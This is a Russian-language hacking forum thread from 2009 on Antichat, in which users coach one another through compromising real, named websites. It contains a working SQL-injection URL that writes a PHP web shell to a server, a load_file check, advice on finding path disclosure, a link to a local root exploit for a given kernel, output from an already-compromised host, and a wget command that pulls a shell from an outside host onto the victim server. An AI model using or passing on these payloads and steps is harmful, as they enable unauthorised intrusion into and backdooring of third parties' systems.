HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10471  
Старый 30.11.2009, 11:23
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
 
Ответить с цитированием

  #10472  
Старый 30.11.2009, 12:06
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от Byrger  
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
http://milw0rm.com/exploits/9479
 
Ответить с цитированием

  #10473  
Старый 30.11.2009, 18:23
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Сори,что тут пишу, вопрос в один ответ. подскажите плз файл-сервер с прямой ссылкой на закачаный мной файл.
 
Ответить с цитированием

  #10474  
Старый 30.11.2009, 18:46
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->


<? php system($_GET[cmd]); ?>

http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*

потом проверил записалось ли...
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/tmp/freek8.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)

Последний раз редактировалось 547; 30.11.2009 в 18:48..
 
Ответить с цитированием

  #10475  
Старый 30.11.2009, 18:47
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Цитата:
Сообщение от 547  
давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->


<? php system($_GET[cmd]); ?>

http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*

но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)
Что значит сервак работает под рутом? у веб сервера id=0? Сомневаюсь... Отсюда вопрос:
а права web сервера пустят тебя в эту папку?

Найди путь к сайту и залей шелл туда.
Права у базы - рут,насколько я понял - это не рут системы...

Последний раз редактировалось p.r0phe.t; 30.11.2009 в 18:53..
 
Ответить с цитированием

  #10476  
Старый 30.11.2009, 19:05
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Цитата:
Сообщение от 547  
хммм... может ты и прав...
но раз я залил шел в папку tmp то можно попробовать выполнить код?
надо только выяснить полный путь к директории..
это и есть полный путь к директории.
Найди в скриптах сайта ошибку,которая выдаст путь к директории сайта,либо через тот же лоадфайл перебором, и лей шелл туда. Как от веб сервера обратиться к папке темп сам бы послушал,если такое возможно. Думаю функцией include,которую опять же нужно найти.

Последний раз редактировалось p.r0phe.t; 30.11.2009 в 19:12..
 
Ответить с цитированием

  #10477  
Старый 30.11.2009, 19:26
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

1 http://madnet.name/tools/madss/
2 http://cacpe.be/index.php?page[]=
3 http://motorama.be/yaneshell.php
Цитата:
$ uname -a
Linux motorama.be 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #10478  
Старый 30.11.2009, 21:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от 547  
блин...
да несовсем в танке на самом деле... коешто понимаю... ну скулю то я найшел.
я просто непойму как он вообще выполнил там скрипт шелла?
to l1ght
и раз турки его уже прибрали может можно раскрыть карты?
Он же расписал все по пунктам.

1. Юзаем тулзу от меднета http://madnet.name/tools/madss/, которая сканит сайт.
2. Видим там это, http://cacpe.be/index.php?page[]=, то есть раскрытие путей.
3. Льем шелл не в папку /tmp, а папку, которую показало нам раскрытие, и которая доступна из веба, то есть
Код:
Warning: Illegal offset type in isset or empty in /var/www/html/index.php on line 118
_______
А, ну да, madss показывает соседей + директории)
_______
Либо у меня руки кривые, либо он через sock_sendpage() не рутается)
_______
Да нет, все таки у меня руки кривые, ибо кто-то уже чмод 777 / -R выполнил)

Последний раз редактировалось mailbrush; 30.11.2009 в 22:29.. Причина: upd2
 
Ответить с цитированием

  #10479  
Старый 01.12.2009, 00:43
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию

wget -O /papka/na/servere/shell.php http://shell.in/shell.txt

Последний раз редактировалось RulleR; 01.12.2009 в 00:53..
 
Ответить с цитированием

  #10480  
Старый 01.12.2009, 00:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от RulleR  
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
wget -O
Регист важен.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.